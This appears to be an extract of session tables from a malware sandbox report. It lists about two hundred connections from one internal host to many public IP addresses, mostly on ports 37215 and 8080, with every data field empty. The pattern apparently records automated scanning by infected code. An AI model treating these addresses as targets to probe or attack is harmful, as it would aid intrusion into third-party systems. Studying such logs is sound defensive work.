                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12996192.168.2.233646641.127.193.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12997192.168.2.234006641.213.10.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12998192.168.2.2334204171.126.164.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12999192.168.2.2353736197.220.113.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13000192.168.2.235002062.63.90.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13001192.168.2.233352041.200.83.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13002192.168.2.235426050.99.138.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13003192.168.2.2354472157.228.223.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13004192.168.2.235194641.5.151.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13005192.168.2.2351104157.206.190.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13006192.168.2.2347410197.218.51.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13007192.168.2.2344604197.232.71.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13008192.168.2.234387841.143.187.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13009192.168.2.2346082197.145.141.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13010192.168.2.2353210141.62.61.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13011192.168.2.2337666157.161.74.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13012192.168.2.235263641.56.44.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13013192.168.2.2353356161.24.245.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13014192.168.2.2348542197.238.43.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13015192.168.2.2359940157.64.173.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13016192.168.2.2339350157.18.137.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13017192.168.2.2334652203.17.25.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13018192.168.2.234875468.182.181.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13019192.168.2.2336180172.161.174.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13020192.168.2.2348884157.93.238.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13021192.168.2.235149241.201.66.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13022192.168.2.2336686139.40.237.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13023192.168.2.2333718197.85.78.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13024192.168.2.2338868197.169.172.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13025192.168.2.235208286.232.30.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13026192.168.2.2345960157.69.158.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13027192.168.2.2338908197.254.80.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13028192.168.2.234561841.157.104.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13029192.168.2.235522241.240.10.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13030192.168.2.2333008105.126.113.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13031192.168.2.234060641.9.240.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13032192.168.2.2355398197.178.71.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13033192.168.2.2349578163.247.154.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13034192.168.2.2342266128.143.227.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13035192.168.2.234036841.199.253.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13036192.168.2.2337702157.146.214.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13037192.168.2.2338660157.89.223.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13038192.168.2.2334516157.56.81.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13039192.168.2.234022835.240.179.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13040192.168.2.2337092197.202.40.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13041192.168.2.2343584157.222.84.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13042192.168.2.233807241.104.80.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13043192.168.2.2350564157.51.200.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13044192.168.2.233476246.220.126.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13045192.168.2.234764441.128.46.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13046192.168.2.235373081.88.87.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13047192.168.2.2334998197.165.120.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13048192.168.2.2335650157.72.16.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13049192.168.2.2360652157.127.93.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13050192.168.2.235392041.131.77.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13051192.168.2.233488641.119.36.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13052192.168.2.2338878123.80.177.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13053192.168.2.2356404202.28.119.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13054192.168.2.2350540197.70.186.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13055192.168.2.234914841.195.81.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13056192.168.2.2332826157.192.194.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13057192.168.2.2342264100.160.249.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13058192.168.2.235043637.200.202.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13059192.168.2.2353018137.108.109.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13060192.168.2.2336490221.22.180.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13061192.168.2.235488241.2.41.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13062192.168.2.233445241.45.63.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13063192.168.2.2359264157.143.121.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13064192.168.2.2357244157.206.88.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13065192.168.2.2333476157.29.210.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13066192.168.2.2340266197.17.178.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13067192.168.2.2351826154.133.160.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13068192.168.2.2348968197.148.151.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13069192.168.2.2349372197.166.170.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13070192.168.2.2351446197.206.0.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13071192.168.2.2358970197.215.0.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13072192.168.2.2346440110.113.62.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13073192.168.2.2343372157.117.173.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13074192.168.2.2334554197.246.95.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13075192.168.2.2346120197.240.67.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13076192.168.2.2354052197.192.123.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13077192.168.2.2360296143.15.17.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13078192.168.2.2354946157.159.6.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13079192.168.2.2333386157.20.248.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13080192.168.2.2339992197.233.37.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13081192.168.2.2343370197.31.8.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13082192.168.2.2349504197.88.188.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13083192.168.2.2357302157.24.73.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13084192.168.2.2335920157.105.135.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13085192.168.2.2335308197.52.253.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13086192.168.2.2338334197.0.40.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13087192.168.2.235525241.141.56.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13088192.168.2.2360076129.100.219.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13089192.168.2.234430262.152.1.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13090192.168.2.233874441.49.158.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13091192.168.2.2343638197.142.237.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13092192.168.2.2335954197.31.231.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13093192.168.2.235423241.255.229.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13094192.168.2.2353526197.77.66.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13095192.168.2.2345612197.193.45.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13096192.168.2.2344432197.102.194.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13097192.168.2.2347256158.0.38.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13098192.168.2.234848841.174.217.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13099192.168.2.233811491.127.210.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13100192.168.2.2341700143.140.197.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13101192.168.2.2338018207.170.237.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13102192.168.2.2359886157.215.171.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13103192.168.2.2338208193.8.39.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13104192.168.2.234170446.3.215.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13105192.168.2.234959241.108.238.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13106192.168.2.235987437.12.138.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13107192.168.2.233963441.99.67.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13108192.168.2.2348006157.221.156.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13109192.168.2.2355128197.231.159.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13110192.168.2.2360498157.146.208.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13111192.168.2.234290441.203.143.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13112192.168.2.234053441.55.61.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13113192.168.2.235111041.74.233.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13114192.168.2.2344076157.145.183.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13115192.168.2.2350046157.125.70.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13116192.168.2.2359006157.45.20.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13117192.168.2.234459441.191.252.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13118192.168.2.2339988197.152.227.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13119192.168.2.235720441.182.165.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13120192.168.2.235620041.85.161.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13121192.168.2.2333488205.60.254.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13122192.168.2.234349442.135.224.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13123192.168.2.235393241.43.215.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13124192.168.2.2355590197.135.153.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13125192.168.2.2358766197.53.17.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13126192.168.2.234659241.132.195.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13127192.168.2.233486241.133.217.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13128192.168.2.2336566157.123.36.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13129192.168.2.2345596157.1.235.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13130192.168.2.233475620.184.109.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13131192.168.2.2340832197.9.217.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13132192.168.2.2353454114.29.129.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13133192.168.2.2338866145.40.54.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13134192.168.2.234258267.6.139.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13135192.168.2.23514648.117.97.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13136192.168.2.2342356178.169.127.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13137192.168.2.2335026117.104.102.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13138192.168.2.234797095.247.98.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13139192.168.2.2356848108.234.61.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13140192.168.2.235679293.154.222.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13141192.168.2.23344284.87.15.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13142192.168.2.2355378181.85.216.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13143192.168.2.2353200133.172.24.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13144192.168.2.234177695.233.43.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13145192.168.2.2349342200.88.241.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13146192.168.2.2352022161.222.91.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13147192.168.2.2352918168.74.62.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13148192.168.2.2336578203.28.134.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13149192.168.2.2334958123.42.162.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13150192.168.2.2344932207.86.25.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13151192.168.2.2348118204.204.123.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13152192.168.2.2349112134.20.212.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13153192.168.2.233904072.224.9.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13154192.168.2.2354480178.24.76.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13155192.168.2.235979870.8.9.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13156192.168.2.2335906118.3.237.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13157192.168.2.235856282.83.23.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13158192.168.2.235039465.62.82.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13159192.168.2.234224867.167.211.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13160192.168.2.2359754152.126.192.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13161192.168.2.234863676.88.104.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13162192.168.2.2347806132.30.106.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13163192.168.2.2344374167.76.176.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13164192.168.2.2352404210.28.155.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13165192.168.2.2355874198.52.11.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13166192.168.2.235071890.121.76.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13167192.168.2.2345828143.88.178.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13168192.168.2.234622268.113.220.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13169192.168.2.235141252.87.9.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13170192.168.2.2341248160.205.6.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13171192.168.2.2341708115.126.177.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13172192.168.2.2341298125.114.62.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13173192.168.2.233592295.120.108.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13174192.168.2.2335502180.233.206.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13175192.168.2.2338734203.77.6.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13176192.168.2.2356230204.52.201.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13177192.168.2.2359066149.101.14.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13178192.168.2.23393301.57.165.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13179192.168.2.234290874.24.47.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13180192.168.2.2359714208.104.58.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13181192.168.2.2341332183.57.218.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13182192.168.2.235431489.204.160.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13183192.168.2.2347038162.2.99.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13184192.168.2.2338848101.217.211.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13185192.168.2.2358908107.97.39.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13186192.168.2.233323891.141.240.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13187192.168.2.235562827.216.166.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13188192.168.2.2355166182.115.31.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13189192.168.2.2352646142.201.18.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13190192.168.2.2337308141.200.181.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13191192.168.2.234245013.240.240.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13192192.168.2.235905886.20.186.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13193192.168.2.2356924100.254.21.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13194192.168.2.2348998195.241.152.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13195192.168.2.234077496.214.209.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13196192.168.2.234227244.147.191.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13197192.168.2.2347678128.207.242.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13198192.168.2.23413609.114.208.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13199192.168.2.235039247.190.128.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13200192.168.2.2353262107.77.29.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13201192.168.2.2356620115.174.96.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13202192.168.2.233629489.53.11.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13203192.168.2.23560021.176.25.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13204192.168.2.235076834.55.245.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13205192.168.2.234164472.158.58.658080
